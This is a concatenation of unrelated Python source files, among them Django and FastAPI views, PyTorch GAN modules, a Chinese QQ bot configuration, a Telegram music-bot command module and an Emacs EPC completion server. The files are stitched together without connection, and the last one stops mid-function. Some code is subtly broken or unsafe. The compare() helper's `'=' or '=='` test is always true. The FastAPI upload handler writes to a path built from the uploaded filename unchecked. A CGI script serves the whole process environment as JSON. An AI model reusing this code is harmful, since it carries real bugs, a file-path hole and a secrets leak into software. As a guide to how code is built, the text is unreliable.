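# Illustrative sketch of the annotated payload (values and the DefaultPagination field
# names are assumptions; only "current_page" and "start" are added by this class):
#
#   {
#       "count": 42,
#       "next": "...?page=3&page_size=20",
#       "previous": "...?page=1&page_size=20",
#       "results": [...],
#       "current_page": 2,
#       "start": 20
#   }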
|
def compare(v1, operator, v2):
if operator == ">":
return v1 > v2
elif operator == "<":
return v1 < v2
elif operator == ">=":
return v1 >= v2
elif operator == "<=":
return v1 <= v2
elif operator == "=" or "==":
return v1 == v2
elif operator == "!=":
return v1 != v2
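
# Minimal usage sketch (illustrative only): exercises a few operator branches,
# including the "="/"==" equality case handled above.
if __name__ == "__main__":
    assert compare(3, ">", 2)
    assert compare(2, "<=", 2)
    assert compare(2, "==", 2)
    assert not compare(2, "!=", 2)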
|
from django.http import HttpResponse
from django.shortcuts import render
from django.views import View
from .models import Grid
from apps.subjects.models import Subject
# Create your views here.
'''
class GridView(View):
template_name = 'grids/grids.html'
def get(self, request):
grids = Grid.objects.filter(code, name, situation)
context = {
'grids': grids,
}
return render(request, self.template_name, context)
''' |
import io
import numpy as np
from enum import Enum
from fastapi import FastAPI, UploadFile, File, HTTPException
from fastapi.responses import StreamingResponse
import cv2
import cvlib as cv
from cvlib.object_detection import draw_bbox
# Assign an instance of the FastAPI class to the variable "app".
# We will interact with the API through this object.
app = FastAPI(title='Implementando un modelo de Machine Learning usando FastAPI')
# List the available models using Enum. Useful when we have predefined options.
class Model(str, Enum):
yolov3tiny = "yolov3-tiny"
yolov3 = "yolov3"
# Usando @app.get("/") definimos un método GET para el endpoint / (que sería como el "home").
@app.get("/")
def home():
return "¡¡¡¡¡Felicitaciones!!!!! La app web está funcionando. Anda ahora a https://producto-datos-lab2.herokuapp.com/docs."
# This endpoint handles the logic needed to detect objects.
# It takes the desired model and the image as input.
@app.post("/predict")
def prediction(model: Model, file: UploadFile = File(...)):
    # 1. Validate the input file
filename = file.filename
fileExtension = filename.split(".")[-1] in ("jpg", "jpeg", "png")
if not fileExtension:
raise HTTPException(status_code=415, detail="Tipo de archivo no soportado.")
    # 2. Transform the raw image into a CV2 image
    # Read the image as a byte stream
image_stream = io.BytesIO(file.file.read())
    # Start the stream at the beginning (position zero)
image_stream.seek(0)
    # Write the stream into a numpy array
file_bytes = np.asarray(bytearray(image_stream.read()), dtype=np.uint8)
    # Decode the numpy array as an image
image = cv2.imdecode(file_bytes, cv2.IMREAD_COLOR)
    # 3. Run the object detection model
    # Run object detection
bbox, label, conf = cv.detect_common_objects(image, model=model)
    # Create an image containing the bounding boxes and labels
output_image = draw_bbox(image, bbox, label, conf)
    # Save it to a directory on the server
cv2.imwrite(f'/tmp/{filename}', output_image)
    # 4. Stream the response back to the client
    # Open the image to read it in binary format
file_image = open(f'/tmp/{filename}', mode="rb")
    # Return the image as a stream using a specific media type
return StreamingResponse(file_image, media_type="image/jpeg")
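
# Minimal client-side sketch (assumptions: the server is running locally on port 8000 and
# "sample.jpg" exists; both names are illustrative, not part of this app):
#
#   import requests
#   with open("sample.jpg", "rb") as f:
#       r = requests.post(
#           "http://localhost:8000/predict?model=yolov3-tiny",
#           files={"file": ("sample.jpg", f, "image/jpeg")},
#       )
#   with open("prediction.jpg", "wb") as out:
#       out.write(r.content)  # annotated image returned by the StreamingResponse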
|
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 Matteo Ingrosso
Basic loop to get baseline values for performance comparison between simulated
images and reference ones.
It simply takes the two optical images as source and computes the metrics for them.
"""
from config import *
from metrics import PSNR, SSIM
from PIL import Image
import os
import torch
import torchvision.transforms as transforms
Image.MAX_IMAGE_PIXELS = 1000000000
psnr = PSNR()
ssim = SSIM()
for region in regions:
o0 = Image.open(os.path.join(source_folder, region, 'o0.jpg'))
o0 = transforms.ToTensor().__call__(o0)
o0 = o0.unsqueeze(0)
o1 = Image.open(os.path.join(source_folder, region, 'o1.jpg'))
o1 = transforms.ToTensor().__call__(o1)
o1 = o1.unsqueeze(0)
psnr_value = psnr(o1, o0).item()
ssim_value = ssim(o1, o0).item()
print('>>>INDICES FOR %s<<<' % (region[2:]))
print('PSNR: %.4f SSIM: %.4f' % (psnr_value, ssim_value))
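
# Minimal sanity-check sketch (illustrative only; exact behaviour depends on the local
# metrics module providing PSNR/SSIM):
#
#   x = torch.rand(1, 3, 64, 64)
#   print(ssim(x, x).item())  # identical inputs should give SSIM close to 1.0
#   print(psnr(x, x).item())  # identical inputs give a very large (or infinite) PSNR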
|
import torch
class Lambda(torch.nn.Module):
def __init__(self, f):
super().__init__()
self.f = f
def forward(self, X):
return self.f(X)
class ResBlock(torch.nn.Module):
def __init__(self, shortcut, act, layers):
super().__init__()
self.sht = shortcut
self.act = act
self.net = torch.nn.Sequential(*layers)
def forward(self, X):
return self.act(self.sht(X) + self.net(X))
class Generator(torch.nn.Module):
def __init__(self, noise_size, hidden_size, max_traj_len):
super().__init__()
assert max_traj_len % 4 == 0
self.net = torch.nn.Sequential(
torch.nn.Linear(noise_size, hidden_size * max_traj_len//4),
Lambda(lambda X: X.view(-1, hidden_size, max_traj_len//4)),
torch.nn.ReLU(),
torch.nn.ConvTranspose1d(hidden_size, hidden_size, 8, stride=2, padding=3),
ResBlock(
shortcut=torch.nn.Conv1d(hidden_size, hidden_size, 1),
act=torch.nn.ReLU(),
layers=[
torch.nn.BatchNorm1d(hidden_size),
torch.nn.ReLU(),
torch.nn.Conv1d(hidden_size, hidden_size, 7, padding=3),
torch.nn.BatchNorm1d(hidden_size),
torch.nn.ReLU(),
torch.nn.Conv1d(hidden_size, hidden_size, 7, padding=3)
]
),
torch.nn.ReLU(),
torch.nn.ConvTranspose1d(hidden_size, hidden_size, 8, stride=2, padding=3),
ResBlock(
shortcut=torch.nn.Conv1d(hidden_size, hidden_size, 1),
act=torch.nn.ReLU(),
layers=[
torch.nn.BatchNorm1d(hidden_size),
torch.nn.ReLU(),
torch.nn.Conv1d(hidden_size, hidden_size, 11, padding=5),
torch.nn.BatchNorm1d(hidden_size),
torch.nn.ReLU(),
torch.nn.Conv1d(hidden_size, hidden_size, 11, padding=5)
]
),
torch.nn.BatchNorm1d(hidden_size),
torch.nn.ReLU(),
torch.nn.Conv1d(hidden_size, 3, 7, padding=3),
torch.nn.Tanh()
)
def forward(self, z):
return self.net(z)
class Discriminator(torch.nn.Module):
def __init__(self, array_length, hidden_size):
super().__init__()
assert array_length % 8 == 0
self.net = torch.nn.Sequential(
Lambda(lambda X: X.squeeze(1)),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(3, hidden_size, 7, stride=2, padding=3)
),
ResBlock(
shortcut=torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 1)
),
act=torch.nn.LeakyReLU(),
layers=[
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 11, padding=5)
),
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 11, padding=5)
),
]
),
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 7, stride=2, padding=3)
),
ResBlock(
shortcut=torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 1)
),
act=torch.nn.LeakyReLU(),
layers=[
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 7, padding=3)
),
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 7, padding=3)
)
]
),
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Conv1d(hidden_size, hidden_size, 7, stride=2, padding=3)
),
Lambda(lambda X: X.view(-1, hidden_size * array_length//8)),
torch.nn.LeakyReLU(),
torch.nn.utils.spectral_norm(
torch.nn.Linear(hidden_size * array_length//8, 1)
)
)
def forward(self, X):
return self.net(X)
@staticmethod
def loss(D, X, Xh):
return D(X).mean(axis=0) - D(Xh).mean(axis=0) |
#!/usr/bin/env python3
import os
import json
from textwrap import indent
import sys
#PRINT OUT ALL ENV VARIABLES AS PLAIN TEXT
# print("Content-Type: text/plain") #let browser know to expect plain text
# print()
# print(os.environ)
#PRINT ENV VARIABLES AS JSON
print("Content-Type: application/json")
print()
print(json.dumps(dict(os.environ), indent=2))
#PRINT QUERY PARAMETER DATA IN HTML
# print("Content-Type: text/html")
# print()
# print(f"<p>QUERY_STRING={os.environ['QUERY_STRING']}</p>")
# posted_bytes = os.environ.get("CONTENT_LENGTH", 0)
# print(f"<p>QUERY_STRING={posted_bytes}</p>")
# if posted_bytes:
# posted = sys.stdin.read(int(posted_bytes))
# print(f"<p> POSTED: <pre>")
# for line in posted.splitlines():
# print(line)
# print("</pre></p>") |
"""
Example showing post-processing effects by modifying the flusher object.
This example is a placeholder for how post-processing *could* work if
we'd provide an API for it.
Note: this example makes heavy use of private variables and makes
assumptions about how the RenderFlusher works that may not hold in the
future.
"""
import numpy as np
import imageio
import pygfx as gfx
from PySide6 import QtWidgets
from wgpu.gui.qt import WgpuCanvas
app = QtWidgets.QApplication([])
canvas = WgpuCanvas()
renderer = gfx.renderers.WgpuRenderer(canvas)
scene = gfx.Scene()
im = imageio.imread("imageio:bricks.jpg").astype(np.float32) / 255
tex = gfx.Texture(im, dim=2).get_view(filter="linear", address_mode="repeat")
geometry = gfx.BoxGeometry(200, 200, 200)
geometry.texcoords.data[:] *= 2 # smaller bricks
material = gfx.MeshPhongMaterial(map=tex, color=(1, 0, 0, 0.2))
cube = gfx.Mesh(geometry, material)
scene.add(cube)
camera = gfx.PerspectiveCamera(70, 16 / 9)
camera.position.z = 400
class MyRenderFlusher(gfx.renderers.wgpu._renderutils.RenderFlusher):
uniform_type = dict(
size="2xf4",
sigma="f4",
support="i4",
amplitude="f4",
)
def __init__(self, device):
super().__init__(device)
self._shader[
"tex_coord_map"
] = """
let a = u_render.amplitude;
tex_coord.x = tex_coord.x + sin(tex_coord.y * 20.0) * a;
"""
self._uniform_data["amplitude"] = 0.02
renderer._flusher = MyRenderFlusher(renderer.device)
def animate():
rot = gfx.linalg.Quaternion().set_from_euler(gfx.linalg.Euler(0.005, 0.01))
cube.rotation.multiply(rot)
renderer.render(scene, camera)
canvas.request_draw()
if __name__ == "__main__":
canvas.request_draw(animate)
app.exec()
|
#coding=utf-8
from mirai import Mirai
import datetime
import time
localtime = time.localtime(time.time())
day_set=localtime.tm_mday
dragonId=[] # "dragon king" ids (there may be more than one)
dragon={} # whether each group has already announced today's dragon king
n_time = datetime.datetime.now() # current time
start_time = 0 # program start time
d_time = datetime.datetime.strptime(str(datetime.datetime.now().date())+'23:00', '%Y-%m-%d%H:%M') # dragon king announcement time
setuSrc="" #setu api地址
bizhiSrc="" #壁纸api地址
zuanHighSrc="" #祖安(High)api地址
zuanLowSrc="" #祖安(Low)api地址
rainbowSrc="" #彩虹屁api地址
searchSrc="https://saucenao.com/" #搜图网址
translateSrc="" #翻译地址
weatherSrc="" #天气api地址
weatherCalledDist="S:\MiRai_QQRobot\info\weather.txt" # weather call-count data storage path
setuCalledDist="S:\MiRai_QQRobot\info\setu.txt" # setu call-count data storage path
bizhiCalledDist="S:\MiRai_QQRobot\info\\bizhi.txt" # wallpaper call-count data storage path
realCalledDist="S:\MiRai_QQRobot\info\\real.txt" # "real" call-count data storage path
responseCalledDist="S:\MiRai_QQRobot\info\\responseCount.txt" # response-count data storage path
setuDist="M:\\Pixiv\\pxer_new\\" # setu storage path
setu18Dist="M:\\Pixiv\\pxer18_new\\" # setu R18 storage path
bizhiDist="M:\\Pixiv\\bizhi\\" # wallpaper storage path
realDist="M:\\Pixiv\\reality\\" # real-photo setu storage path
timeDist="M:\\pixiv\\time\\" # time image folder storage path
responseDist="S:\MiRai_QQRobot\info\\response.txt" # log storage path
responseOldDist="S:\MiRai_QQRobot\info\\oldResponse.txt" # old log storage path
adminDist="S:\MiRai_QQRobot\info\\admin.txt" # admin data storage path
angryDist="S:\\MiRai_QQRobot\\img\\angry.jpg" # absolute path of the "angry" image
dragonDist="S:\MiRai_QQRobot\info\dragon.txt" # dragon king data record
searchCountDist="S:\MiRai_QQRobot\info\searchCount.txt" # search counter storage path
setuBotDist="M:\pixiv\\botImage\\" # path where images received by the setu bot listener are saved
searchDist="M:\pixiv\\search\\" # path where images for the setu bot image search are saved
clockPreviewDist="M:\pixiv\\time\preview\\" # clock face preview image storage path
clockSaveDist="S:\MiRai_QQRobot\info\\clockChoice.txt" # clock face selection data storage path
reply_word=["啧啧啧","确实","giao","???","???","芜湖","是谁打断了复读?","是谁打断了复读?","老复读机了","就这","就这?","就这?"] #复读关键词
non_reply=["setu","bizhi","","别老摸了,给爷冲!","real","几点了","几点啦","几点啦?","几点了?","冲?","今天我冲不冲?"] #不复读关键词
setuCallText=["[Image::A3C91AFE-8834-1A67-DA08-899742AEA4E5]","[Image::A0FE77EE-1F89-BE0E-8E2D-62BCD1CAB312]","[Image::04923170-2ACB-5E94-ECCD-953F46E6CAB9]","[Image::3FFFE3B5-2E5F-7307-31A4-2C7FFD2F395F]","[Image::8A3450C7-0A98-4E81-FA24-4A0342198221]","setu","车车","开车","来点色图","来点儿车车"]
searchCallText=["search","搜图"]
timeCallText=["几点啦","几点了","几点啦?","几点了?","time"]
setuBot=[]
setuGroup=[]
repeatBot=[]
command="""command:
打开setu开关:
setting.setuEnable
关闭setu开关:
setting.setuDisable
打开r18开关:
setting.r18Enable
关闭r18开关:
setting.r18Disable
允许某成员要setu:
setting.memberSetuEnable@member
禁止某成员要setu:
setting.memberSetuDisable@member
设置模式为'normal/zuanHigh/zuanLow/rainbow':
setting.setMode.'normal/zuanHigh/zuanLow/rainbow'
设置setu功能关闭时间:
setting.timeDisable HH:MM to HH:MM
设置setu功能全天开放:
setting.timeAllDay
获取目前全部信息:
check.all
获取某成员setu索取计数:
check.memberSetuCount@member
获取本群内群成员setu索取计数:
check.memberSetuCountAll
获取所有管理人员:
check.allAdmin"""
hostCommand="""Host Command:
本地setu:
setting.setSetuLocal
网络setu:
setting.setSetuNet
本地bizhi:
setting.setBizhiLocal
网络bizhi:
setting.setBizhiNet
关闭机器人:
setting.offline
打开机器人(offline状态下):
setting.online
添加管理员:
setting.addAdmin@member
删除管理员:
setting.deleteAdmin@member
查看系统信息:
info.sys"""
info="""info:
setu调用次数:info.setuCount
bihzi调用次数:info.bizhiCount
天气调用次数:info.weatherCount"""
menu="""menu:
1.营销号生成器(暂时关闭)
2.问我问题
3.碧蓝航线wiki舰娘/装备查询
4.天气查询
5.setu
6.bizhi
7.p站搜图
使用 @机器人 编号 查询使用方法"""
mode="""mode:
1.normal - 普通模式
2.zuanHigh - 祖安模式(高能)
3.zuanLow - 祖安模式(低能)
4.rainbow - 彩虹屁模式
使用 @机器人 编号 调用
"""
status={} # current bot status
# mode_now="normal" # bot speech mode (normal, zuanHigh, zuanLow, rainbow)
MemberList={} # group members
clockChoice={} # clock face selection
blackList=[] # blacklist
|
from asyncio import QueueEmpty
from pyrogram import Client, filters
from Yukki import app
from Yukki.YukkiUtilities.helpers.decorators import errors
from Yukki.YukkiUtilities.helpers.filters import command, other_filters
from Yukki.YukkiUtilities.tgcallsrun import (yukki, clear, get, is_empty, put, task_done)
from Yukki.YukkiUtilities.database.queue import (is_active_chat, add_active_chat, remove_active_chat, music_on, is_music_playing, music_off)
from Yukki.YukkiUtilities.helpers.inline import play_keyboard
from pyrogram.types import (
CallbackQuery,
InlineKeyboardButton,
InlineKeyboardMarkup,
InputMediaPhoto,
Message,
)
import os
import random
import asyncio
import shutil
from os import path
from time import time
import time as sedtime
from typing import Union
import youtube_dl
from youtubesearchpython import VideosSearch
from pyrogram.errors import UserAlreadyParticipant, UserNotParticipant
from pyrogram.types import Audio, Voice
from Yukki import dbb, BOT_USERNAME, BOT_ID, ASSID, ASSNAME, ASSUSERNAME, ASSMENTION
from Yukki.YukkiUtilities.tgcallsrun import convert, download, smexy
from Yukki.YukkiUtilities.helpers.thumbnails import gen_thumb
from Yukki.YukkiUtilities.helpers.chattitle import CHAT_TITLE
from Yukki.YukkiUtilities.helpers.ytdl import ytdl_opts
from Yukki.YukkiUtilities.helpers.inline import (search_markup, play_markup, playlist_markup, audio_markup)
from Yukki.YukkiUtilities.helpers.gets import (get_url, themes, random_assistant)
flex = {}
async def member_permissions(chat_id: int, user_id: int):
perms = []
member = await app.get_chat_member(chat_id, user_id)
if member.can_manage_voice_chats:
perms.append("can_manage_voice_chats")
return perms
from Yukki.YukkiUtilities.helpers.administrator import adminsOnly
@app.on_message(filters.command("cleandb"))
async def stop_cmd(_, message):
chat_id = message.chat.id
try:
clear(message.chat.id)
except QueueEmpty:
pass
await remove_active_chat(chat_id)
try:
yukki.pytgcalls.leave_group_call(message.chat.id)
except:
pass
await message.reply_text("Erased Databae, Queues, Logs, Raw Files, Downloads.")
@app.on_message(filters.command("pause"))
async def pause_cmd(_, message):
if message.sender_chat:
return await message.reply_text("You're an __Anonymous Admin__!\nRevert back to User Account.")
permission = "can_manage_voice_chats"
m = await adminsOnly(permission, message)
if m == 1:
return
checking = message.from_user.mention
chat_id = message.chat.id
if not await is_active_chat(chat_id):
return await message.reply_text("I dont think if something's playing on voice chat")
elif not await is_music_playing(message.chat.id):
return await message.reply_text("I dont think if something's playing on voice chat")
await music_off(chat_id)
yukki.pytgcalls.pause_stream(message.chat.id)
await message.reply_text(f"🎧 Voicechat Paused by {checking}!")
@app.on_message(filters.command("resume"))
async def stop_cmd(_, message):
if message.sender_chat:
return await message.reply_text("You're an __Anonymous Admin__!\nRevert back to User Account.")
permission = "can_manage_voice_chats"
m = await adminsOnly(permission, message)
if m == 1:
return
checking = message.from_user.mention
chat_id = message.chat.id
if not await is_active_chat(chat_id):
return await message.reply_text("I dont think if something's playing on voice chat")
elif await is_music_playing(message.chat.id):
return await message.reply_text("I dont think if something's playing on voice chat")
else:
await music_on(chat_id)
yukki.pytgcalls.resume_stream(message.chat.id)
await message.reply_text(f"🎧 Voicechat Resumed by {checking}!")
@app.on_message(filters.command(["stop", "end"]))
async def stop_cmd(_, message):
if message.sender_chat:
return await message.reply_text("You're an __Anonymous Admin__!\nRevert back to User Account.")
permission = "can_manage_voice_chats"
m = await adminsOnly(permission, message)
if m == 1:
return
checking = message.from_user.mention
chat_id = message.chat.id
if await is_active_chat(chat_id):
try:
clear(message.chat.id)
except QueueEmpty:
pass
await remove_active_chat(chat_id)
yukki.pytgcalls.leave_group_call(message.chat.id)
await message.reply_text(f"🎧 Voicechat End/Stopped by {checking}!")
else:
return await message.reply_text("I dont think if something's playing on voice chat")
@app.on_message(filters.command("skip"))
async def stop_cmd(_, message):
if message.sender_chat:
return await message.reply_text("You're an __Anonymous Admin__!\nRevert back to User Account.")
permission = "can_manage_voice_chats"
m = await adminsOnly(permission, message)
if m == 1:
return
checking = message.from_user.mention
chat_id = message.chat.id
chat_title = message.chat.title
if not await is_active_chat(chat_id):
await message.reply_text("Nothing's playing on MUNNA X MUSIC")
else:
task_done(chat_id)
if is_empty(chat_id):
await remove_active_chat(chat_id)
await message.reply_text("No more music in __Queue__ \n\nLeaving Voice Chat")
yukki.pytgcalls.leave_group_call(message.chat.id)
return
else:
afk = get(chat_id)['file']
f1 = (afk[0])
f2 = (afk[1])
f3 = (afk[2])
finxx = (f"{f1}{f2}{f3}")
if str(finxx) != "raw":
mystic = await message.reply_text("MUNNA X MUSIC is currently playing Playlist...\n\nDownloading Next Music From Playlist....")
url = (f"https://www.youtube.com/watch?v={afk}")
try:
with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
x = ytdl.extract_info(url, download=False)
except Exception as e:
return await mystic.edit(f"Failed to download this video.\n\n**Reason**:{e}")
title = (x["title"])
videoid = afk
def my_hook(d):
if d['status'] == 'downloading':
percentage = d['_percent_str']
per = (str(percentage)).replace(".","", 1).replace("%","", 1)
per = int(per)
eta = d['eta']
speed = d['_speed_str']
size = d['_total_bytes_str']
bytesx = d['total_bytes']
if str(bytesx) in flex:
pass
else:
flex[str(bytesx)] = 1
if flex[str(bytesx)] == 1:
flex[str(bytesx)] += 1
sedtime.sleep(1)
mystic.edit(f"Downloading {title[:50]}\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
if per > 500:
if flex[str(bytesx)] == 2:
flex[str(bytesx)] += 1
sedtime.sleep(0.5)
mystic.edit(f"Downloading {title[:50]}...\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
if per > 800:
if flex[str(bytesx)] == 3:
flex[str(bytesx)] += 1
sedtime.sleep(0.5)
mystic.edit(f"Downloading {title[:50]}....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
if per == 1000:
if flex[str(bytesx)] == 4:
flex[str(bytesx)] = 1
sedtime.sleep(0.5)
mystic.edit(f"Downloading {title[:50]}.....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} in {chat_title} | ETA: {eta} seconds")
loop = asyncio.get_event_loop()
xxx = await loop.run_in_executor(None, download, url, my_hook)
file = await convert(xxx)
yukki.pytgcalls.change_stream(chat_id, file)
thumbnail = (x["thumbnail"])
duration = (x["duration"])
duration = round(x["duration"] / 60)
theme = random.choice(themes)
ctitle = (await app.get_chat(chat_id)).title
ctitle = await CHAT_TITLE(ctitle)
f2 = open(f'search/{afk}id.txt', 'r')
userid =(f2.read())
thumb = await gen_thumb(thumbnail, title, userid, theme, ctitle)
user_id = userid
buttons = play_markup(videoid, user_id)
await mystic.delete()
semx = await app.get_users(userid)
await message.reply_photo(
photo= thumb,
reply_markup=InlineKeyboardMarkup(buttons),
caption=(f"<b>__Skipped Voice Chat__</b>\n\n🎥<b>__Started Playing:__ </b>[{title[:25]}]({url}) \n⏳<b>__Duration:__</b> {duration} Mins\n👤**__Requested by:__** {semx.mention}")
)
os.remove(thumb)
else:
yukki.pytgcalls.change_stream(chat_id, afk)
_chat_ = ((str(afk)).replace("_","", 1).replace("/","", 1).replace(".","", 1))
f2 = open(f'search/{_chat_}title.txt', 'r')
title =(f2.read())
f3 = open(f'search/{_chat_}duration.txt', 'r')
duration =(f3.read())
f4 = open(f'search/{_chat_}username.txt', 'r')
username =(f4.read())
f4 = open(f'search/{_chat_}videoid.txt', 'r')
videoid =(f4.read())
user_id = 1
videoid = str(videoid)
if videoid == "smex1":
buttons = audio_markup(videoid, user_id)
else:
buttons = play_markup(videoid, user_id)
await message.reply_photo(
photo=f"downloads/{_chat_}final.png",
reply_markup=InlineKeyboardMarkup(buttons),
caption=f"<b>__Skipped Voice Chat__</b>\n\n🎥<b>__Started Playing:__</b> {title} \n⏳<b>__Duration:__</b> {duration} \n👤<b>__Requested by:__ </b> {username}",
)
return |
def Print(*args):
'print helper'
print(*args, sep='\n\n')
# decorators:
result = lambda f: f()
def func():
return "[ I'm a function ]"
def data():
return "[ I'm a string ]"
data = result(data)
@result
def text():
return "[ I'm a string ]"
Print(
func(),
text,
data,
)
|
from django.shortcuts import render, get_object_or_404, redirect
from django.urls import reverse, reverse_lazy
from django.views.generic.list import ListView
from django.views.generic.detail import DetailView
from django.views.generic.edit import (
CreateView,
UpdateView,
DeleteView)
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.http import HttpResponseRedirect
from trips.models import Trip
from django.contrib.auth.models import User
from trips.forms import TripForm
class TripList(ListView):
'''Renders all the Trips currently made by site Users.'''
model = Trip
template_name = 'trips/index.html'
def get(self, request):
'''Render a context containing all Trip instances.'''
trips = self.get_queryset().all()
return render(request, self.template_name, {
'trips': trips
})
class TripDetail(DetailView):
'''Displays a page with instructions associated with a specific trip.'''
model = Trip
template_name = 'trips/instructions.html'
def get(self, request, pk):
"""Renders a page to show the boarding instructions for a single Trip.
Parameters:
request(HttpRequest): the GET request sent to the server
pk(int): unique id value of the Trip instance
Returns:
HttpResponse: the view of the detail template
"""
trip = self.get_queryset().get(pk=pk)
context = {
'trip': trip
}
return render(request, self.template_name, context)
class TripCreate(CreateView):
'''Allows user to add new Trip instances.'''
model = Trip
form_class = TripForm
template_name = 'trips/create.html'
queryset = Trip.objects.all()
def form_valid(self, form):
'''Initializes the passenger based on who submitted the form.'''
form.instance.passenger = self.request.user
return super().form_valid(form)
class TripUpdate(UserPassesTestMixin, UpdateView):
'''Allows for editing of a trip.'''
model = Trip
form_class = TripForm
template_name = 'trips/update.html'
queryset = Trip.objects.all()
def test_func(self):
'''Ensures the user editing the trip is the passenger who posted it.'''
trip = self.get_object()
return (self.request.user == trip.passenger)
class TripDelete(UserPassesTestMixin, DeleteView):
'''Allows for removal of Trip instances by User.'''
model = Trip
template_name = 'trips/deletion.html'
success_url = reverse_lazy('trips:all-trips')
queryset = Trip.objects.all()
def get(self, request, pk):
"""Renders a page to show the boarding instructions for a single Trip.
Parameters:
request(HttpRequest): the GET request sent to the server
        pk(int): unique id value of the Trip instance
Returns:
HttpResponse: the view of the detail template
"""
trip = self.get_queryset().get(pk=pk)
context = {
'trip': trip
}
return render(request, self.template_name, context)
def test_func(self):
'''Ensures the user removing the trip is the one who posted it.'''
trip = self.get_object()
return (self.request.user == trip.passenger)
|
"""
Fortpy EPC server. Adapted from jedi EPC server by Takafumi Arakaki.
"""
import os
import sys
import re
import itertools
import logging
import site
fortpy = None # I will load it later
def fortpy_script(source, line, column, source_path):
return fortpy.isense.Script(source, line, column, source_path)
def candidate_symbol(comp):
"""
Return a character representing completion type.
:type comp: fortpy.isense.classes.Completion
:arg comp: A completion object returned by `fortpy.isense.Script.complete`.
"""
try:
return comp.type[0].lower()
except (AttributeError, TypeError):
return '?'
def candidates_description(comp):
"""
Return `comp.description` in an appropriate format.
* Avoid return a string 'None'.
* Strip off all newlines. This is required for using
`comp.description` as candidate summary.
"""
desc = comp.description
#We need to try and format it to be a bit shorter for the autocomplete
#The name and description can't be longer than 70 chars.
sdesc = _WHITESPACES_RE.sub(' ', desc) if desc and desc != 'None' else ''
# target_len = 80-len(comp.name)-1
# if len(sdesc) > target_len + 1:
# return sdesc[:target_len]
# else:
return sdesc
_WHITESPACES_RE = re.compile(r'\s+')
def complete(*args):
reply = []
script = fortpy_script(*args).completions()
for comp in script:
reply.append(dict(
word=comp.name,
doc=comp.docstring,
description=candidates_description(comp),
symbol=candidate_symbol(comp),
))
return reply
def bracket_complete(*args):
"""Gives documentation information for a function and its signature.
Raised whenever '(' is entered."""
script = fortpy_script(*args).bracket_complete()
return script
def reparse_module(*args):
"""Reparses the module in the specified file paths from disk."""
return _reparse_file(*args)
def _reparse_file(source, line, column, path):
"""Handles the reparse using the appropriate code parser for SSH or
the local file system."""
import fortpy.isense.cache as cache
parser = cache.parser()
if parser.tramp.is_ssh(path):
cache.parser("ssh").reparse(path)
else:
parser.reparse(path)
return "{}... Done".format(path)
def get_in_function_call(*args):
#This gets called whenever the buffer goes idle and shows either
#signature completion information or an autocomplete suggestion.
script = fortpy.isense.Script(*args)
result = script.in_function_call()
#The format of result is [dict/list of complete, iexec]
if isinstance(result, list):
#We are offering autocomplete information for the call signature
#parameter spot that the cursor is over.
reply = []
for comp in result:
reply.append(dict(
word=comp.name,
doc=comp.docstring,
description=candidates_description(comp),
symbol=candidate_symbol(comp),
))
return dict(
reply=reply,
replytype="completion",
)
else:
#We have compiled parameter information for the parameter under
#the cursor.
return dict(
reply=result,
replytype="signature",
)
def goto(*args):
return []
def related_names(*args):
return []
def get_definition(*args):
d = fortpy.isense.Script(*args).goto_definitions()
result = dict(
doc=d.fulldoc,
description=d.description,
desc_with_module="",
line_nr=d.line,
column=d.column,
module_path=d.module_path,
name=getattr(d, 'name', []),
full_name=getattr(d, 'full_name', []),
type=getattr(d, 'type', []),
)
return [result]
def defined_names(*args):
return []
def get_module_version(module):
try:
from pkg_resources import get_distribution, DistributionNotFound
try:
return get_distribution(module.__name__).version
except DistributionNotFound:
pass
except ImportError:
pass
notfound = object()
for key in ['__version__', 'version']:
version = getattr(module, key, notfound)
if version is not notfound:
return version
def get_fortpy_version():
import epc
import sexpdata
return [dict(
name=module.__name__,
file=getattr(module, '__file__', []),
version=get_module_version(module) or [],
) for module in [sys, fortpy, epc, sexpdata]]
def fortpy_epc_server(address='localhost', port=0, port_file=sys.stdout,
sys_path=[], virtual_env=[],
debugger=None, log=None, log_level=None,
log_traceback=None):
add_virtualenv_path()
for p in virtual_env:
add_virtualenv_path(p)
sys_path = map(os.path.expandvars, map(os.path.expanduser, sys_path))
sys.path = [''] + list(filter(None, itertools.chain(sys_path, sys.path)))
import_fortpy()
import epc.server
server = epc.server.EPCServer((address, port))
server.register_function(complete)
server.register_function(get_in_function_call)
server.register_function(goto)
server.register_function(related_names)
server.register_function(get_definition)
server.register_function(defined_names)
server.register_function(get_fortpy_version)
server.register_function(bracket_complete)
server.register_function(reparse_module)
@server.register_function
def toggle_log_traceback():
server.log_traceback = not server.log_traceback
return server.log_traceback
port_file.write(str(server.server_address[1])) # needed for Emacs client
port_file.write("\n")
port_file.flush()
if port_file is not sys.stdout:
port_file.close()
# This is not supported Python-EPC API, but I am using this for
# backward compatibility for Python-EPC < 0.0.4. In the future,
# it should be passed to the constructor.
server.log_traceback = bool(log_traceback)
if log:
handler = logging.FileHandler(filename=log, mode='w')
if log_level:
log_level = getattr(logging, log_level.upper())
